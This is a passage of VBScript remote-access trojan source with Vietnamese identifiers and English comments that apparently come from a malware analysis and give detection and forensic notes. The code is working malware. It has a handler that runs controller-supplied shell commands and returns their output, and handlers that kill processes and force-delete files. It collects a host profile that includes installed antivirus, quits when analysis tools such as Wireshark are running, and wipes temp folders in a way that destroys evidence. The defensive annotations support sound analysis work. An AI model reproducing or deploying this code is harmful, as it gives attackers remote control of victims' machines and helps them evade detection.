- dim DT_PROC
- for each DT_PROC in CAC_DT_THEO_COT_PROC
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.name & "|"
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.processid & "|"
- LAY_TTIN_CAC_TIEN_TRINH_HAM = LAY_TTIN_CAC_TIEN_TRINH_HAM & DT_PROC.executablepath & BO_CHIA_KY_TU
- next
- end function
- ' "exit-process" handler: force-terminates a process tree by PID.
- ' MA_SO_TIEN_TRINH - process id, concatenated into the command line unchanged.
- ' Detection notes: wscript.exe spawning "taskkill /F /T /PID ..." in a minimized window (7)
- ' and waiting for it to finish is unusual for legitimate scripts.
- sub TAT_TIEN_TRINH_SUB(MA_SO_TIEN_TRINH)
- on error resume next
- OBJ_WS_SHELL.run "taskkill /F /T /PID " & MA_SO_TIEN_TRINH,7,true
- end sub
- ' "delete" handler: tries the given path first as a file, then as a folder, with the
- ' force flag set; whichever call does not apply fails silently under "on error resume next".
- ' DUONG_DAN_FILE_OR_THU_MUC - path to delete.
- sub XOA_TAP_TIN_VA_THU_MUC_SUB(DUONG_DAN_FILE_OR_THU_MUC)
- on error resume next
- OBJ_HE_THONG_TAPTIN.deletefile DUONG_DAN_FILE_OR_THU_MUC,true
- OBJ_HE_THONG_TAPTIN.deletefolder DUONG_DAN_FILE_OR_THU_MUC,true
- end sub
- ' "cmd-shell" handler: runs a controller-supplied command line and returns its output.
- ' LENH_THUC_THI - command text appended to "%comspec% /c ".
- ' Returns stdout when it has data, otherwise stderr, otherwise an empty string.
- ' Detection notes: the process chain is wscript.exe -> cmd.exe /c <command>, which
- ' command-line logging (process-creation auditing or EDR) records in full.
- function DIEU_KHIEN_CMD_HAM(LENH_THUC_THI)
- dim MANG_CUA_TUI,OBJ_WS_SHELL_EXECU,DOC_DATA_SHELL_OUT
- set OBJ_WS_SHELL_EXECU = OBJ_WS_SHELL.exec("%comspec% /c " & LENH_THUC_THI)
- if not OBJ_WS_SHELL_EXECU.stdout.atendofstream then
- DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stdout.readall
- elseif not OBJ_WS_SHELL_EXECU.stderr.atendofstream then
- DOC_DATA_SHELL_OUT = OBJ_WS_SHELL_EXECU.stderr.readall
- else
- DOC_DATA_SHELL_OUT = ""
- end if
- DIEU_KHIEN_CMD_HAM = DOC_DATA_SHELL_OUT
- end function
- ' Builds the host-profile string sent with every controller request. Fields, joined by "<|>":
- '   host id, %computername%, %username%, OS caption, the literal "plus",
- '   installed AV product names, and the first-run marker ("true/false - <date>").
- ' Detection notes: this field order and the literal "plus" give a stable pattern for
- ' matching the request header in captured traffic.
- function HAM_TAP_HOP_CAC_INFOR
- on error resume next
- ' The string is built only when "inf" is empty.
- ' NOTE(review): looks intended as a cache; whether "inf" persists between calls is not shown here.
- if inf = "" then
- inf = HAM_LAY_TEN_VIC_THEO_MA_HW & BO_CHIA_KY_TU
- inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%computername%") & BO_CHIA_KY_TU
- inf = inf & OBJ_WS_SHELL.expandenvironmentstrings("%username%") & BO_CHIA_KY_TU
- set RT_INF = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set HDH = RT_INF.execquery("select * from win32_operatingsystem")
- ' Only the first Win32_OperatingSystem record is used.
- for each TEN_HDH in HDH
- inf = inf & TEN_HDH.caption & BO_CHIA_KY_TU
- exit for
- next
- inf = inf & "plus" & BO_CHIA_KY_TU
- inf = inf & HAM_LAY_TEN_TRINH_AV & BO_CHIA_KY_TU
- inf = inf & CO_HAY_KHONG_TU_USB
- HAM_TAP_HOP_CAC_INFOR = inf
- else
- HAM_TAP_HOP_CAC_INFOR = inf
- end if
- end function
- ' Returns the host identifier: the first non-empty logical-disk volume serial number
- ' followed by the literal " | MeoIT".
- ' Side effect: creates the staging folder %TEMP%\Luu_Tam_Nhe when it is missing; that
- ' folder name is a host-based indicator for this sample.
- function HAM_LAY_TEN_VIC_THEO_MA_HW
- on error resume next
- if not OBJ_HE_THONG_TAPTIN.FolderExists(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe") then OBJ_HE_THONG_TAPTIN.CreateFolder(STR_DUONG_DAN_USER_TEMP & "\Luu_Tam_Nhe")
- set RT_TEN_MACHINE = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set CAC_HDD = RT_TEN_MACHINE.execquery ("select * from win32_logicaldisk")
- for each O_DIA_CUNG_SSD in CAC_HDD
- if O_DIA_CUNG_SSD.volumeserialnumber <> "" then
- HAM_LAY_TEN_VIC_THEO_MA_HW = O_DIA_CUNG_SSD.volumeserialnumber & " | MeoIT"
- exit for
- end if
- next
- end function
- ' Returns the display names of registered antivirus products, each followed by " .",
- ' or "None AV" when the query yields nothing.
- ' The Windows version is read from WMI to choose between the "securitycenter" and
- ' "securitycenter2" namespaces.
- ' NOTE(review): the version handling runs with errors suppressed and looks unreliable;
- ' do not infer the queried namespace from the OS version alone - confirm dynamically.
- function HAM_LAY_TEN_TRINH_AV
- on error resume next
- HAM_LAY_TEN_TRINH_AV = ""
- set OBJ_WMI_HDH = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
- set CAC_DT_THEO_COT_HDH = OBJ_WMI_HDH.execquery("select * from win32_operatingsystem",,48)
- for each DT_AV in CAC_DT_THEO_COT_HDH
- PHIEN_BAN_AV = split(DT_AV.version,".")
- next
- PHIEN_BAN_AV = split(CAC_DT_THEO_COT_HDH.version,".")
- PHIEN_BAN_HDH = PHIEN_BAN_AV (0) & "."
- for x = 1 to ubound(PHIEN_BAN_AV)
- PHIEN_BAN_HDH = PHIEN_BAN_HDH & PHIEN_BAN_AV(i)
- next
- PHIEN_BAN_HDH = eval(PHIEN_BAN_HDH)
- if PHIEN_BAN_HDH > 6 then TRUNG_TAM_SECU = "securitycenter2" else TRUNG_TAM_SECU = "securitycenter"
- ' Security Center query; WMI activity logging shows this as a read of AntiVirusProduct.
- set DT_TRUNG_TAM_SECU = getobject("winmgmts:\\localhost\root\" & TRUNG_TAM_SECU)
- set COT_AV = DT_TRUNG_TAM_SECU.execquery("select * from antivirusproduct","wql",0)
- for each TEN_AV in COT_AV
- HAM_LAY_TEN_TRINH_AV = HAM_LAY_TEN_TRINH_AV & TEN_AV.displayname & " ."
- next
- if HAM_LAY_TEN_TRINH_AV = "" then HAM_LAY_TEN_TRINH_AV = "None AV"
- end function
- ' Analysis-tool check, run on every poll iteration: issues one WMI Win32_Process query per
- ' hard-coded process name and exits the script when a query reports a count of 1.
- ' Detection notes: a script host issuing this burst of name-specific Win32_Process queries
- ' every few seconds is itself a behavioural indicator visible in WMI activity logs, and the
- ' name list below is a usable static signature for the sample.
- sub CHONG_CAC_PROC
- on error resume next
- CHUOI_PC = "."
- set DT_WIN_MGR = GetObject("winmgmts:" _
- & "{impersonationLevel=impersonate}!\\" & CHUOI_PC & "\root\cimv2")
- set TTR_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'taskmgr.exe'")
- set TTR_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'processhacker.exe'")
- set TTR_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'procexp.exe'")
- set TTR_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'apatedns.exe'")
- set TTR_NAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'fakenet.exe'")
- set TTR_SAU = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'fab.exe'")
- set TTR_BAY = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'cports.exe'")
- set TTR_TAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'smsniff.exe'")
- set TTR_CHIN_1 = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'pchunter32.exe'")
- set TTR_CHIN_2 = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'pchunter64.exe'")
- set TTR_MUOI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'roguekiller.exe'")
- set TTR_MUOI_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'spybhoremover.exe'")
- set TTR_MUOI_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'defenderdaemon.exe'")
- set TTR_MUOI_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'HijackThis.exe'")
- set TTR_MUOI_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Wireshark.exe'")
- set TTR_MUOI_LAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Lookup.exe'")
- set TTR_MUOI_SAU = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Killer.exe'")
- set TTR_MUOI_BAY = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Vbs Deleter.exe'")
- set TTR_MUOI_TAM = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'sandboxierpcss.exe'")
- set TTR_MUOI_CHIN = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'netagent.exe'")
- set TTR_HAI_MUOI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'tiger-Firewall.exe'")
- set TTR_HAI_MUOI_MOT = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'TcpView.exe'")
- set TTR_HAI_MUOI_HAI = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'ProcessLasso.exe'")
- set TTR_HAI_MUOI_BA = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'Active Ports.exe'")
- set TTR_HAI_MUOI_BON = DT_WIN_MGR.ExecQuery _
- ("SELECT * FROM Win32_Process WHERE Name = " & _
- "'SystemExplorer.exe'")
- ' The results are tested in three groups; each test compares the query's Count with 1.
- ' Quitting here ends only the running instance - the Run values and file copies stay in place.
- if TTR_MOT.Count = 1 or TTR_HAI.Count = 1 or TTR_BA.Count = 1 or TTR_BON.Count = 1 or TTR_NAM.Count = 1 or TTR_SAU.Count = 1 or TTR_BAY.Count = 1 or TTR_TAM.Count = 1 then
- wscript.quit
- end if
- if TTR_CHIN_1.Count = 1 or TTR_CHIN_2.Count = 1 or TTR_MUOI.Count = 1 or TTR_MUOI_MOT.Count = 1 or TTR_MUOI_HAI.Count = 1 or TTR_MUOI_BA.Count = 1 or TTR_MUOI_BON.Count = 1 then
- wscript.quit
- end if
- if TTR_MUOI_LAM.Count = 1 or TTR_MUOI_SAU.Count = 1 or TTR_MUOI_BAY.Count = 1 or TTR_MUOI_TAM.Count = 1 or TTR_MUOI_CHIN.Count = 1 or TTR_HAI_MUOI.Count = 1 or TTR_HAI_MUOI_MOT.Count = 1 or TTR_HAI_MUOI_HAI.Count = 1 or TTR_HAI_MUOI_BA.Count = 1 or TTR_HAI_MUOI_BON.Count = 1 then
- wscript.quit
- end if
- end sub
- ' Deletes files and subfolders of the given folder whose creation date is more than
- ' 8 days old (force flag set). Called from the install routine for the temp and IE cache folders.
- ' STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X - folder to clean.
- ' Forensic note: this runs on every poll iteration, so older temp-folder evidence on an
- ' infected host is continuously removed.
- sub XOA_TEMP_SAU_X_NGAY_SUB(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
- On Error Resume Next
- dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
- dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
- dim OBJ_CAC_FILE_TEMP
- dim i
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB_AUTO_X)
- For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
- If OBJ_CAC_FILE_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_FILE_TEMP.delete(True) End If
- Next
- ' The subfolder pass is repeated 11 times.
- For i = 0 To 10
- For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
- If OBJ_CAC_DIR_TEMP.DateCreated < (Now() - 8) Then OBJ_CAC_DIR_TEMP.Delete(True) End If
- Next
- Next
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
- set OBJ_CAC_DIR_TEMP = Nothing
- set OBJ_CAC_FILE_TEMP = Nothing
- end sub
- ' Deletes every file and subfolder of the given folder regardless of age (force flag set).
- ' Called only from the uninstall routine, for the temp and IE cache folders.
- ' STR_DUONG_DAN_TEMP_IN_SUB - folder to empty.
- ' Forensic note: after a controller-issued uninstall these folders will be empty, so
- ' recovery of dropped payloads has to rely on backups, shadow copies or file carving.
- sub XOA_TEMP_SUB_LUC_GO(STR_DUONG_DAN_TEMP_IN_SUB)
- On Error Resume Next
- dim OBJ_HE_THONG_TAPTIN_CHO_TEMP
- dim OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP,OBJ_CAC_DIR_TEMP
- dim OBJ_CAC_FILE_TEMP
- dim i
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = CreateObject("Scripting.FileSystemObject")
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = OBJ_HE_THONG_TAPTIN_CHO_TEMP.GetFolder(STR_DUONG_DAN_TEMP_IN_SUB)
- For Each OBJ_CAC_FILE_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.Files
- OBJ_CAC_FILE_TEMP.delete(True)
- Next
- ' The subfolder pass is repeated 11 times.
- For i = 0 To 10
- For Each OBJ_CAC_DIR_TEMP In OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP.SubFolders
- OBJ_CAC_DIR_TEMP.Delete(True)
- Next
- Next
- set OBJ_HE_THONG_TAPTIN_CHO_TEMP = Nothing
- set OBJ_DUONG_DAN_FOLDER_CAN_CHO_TEMP = Nothing
- set OBJ_CAC_DIR_TEMP = Nothing
- set OBJ_CAC_FILE_TEMP = Nothing
- end sub"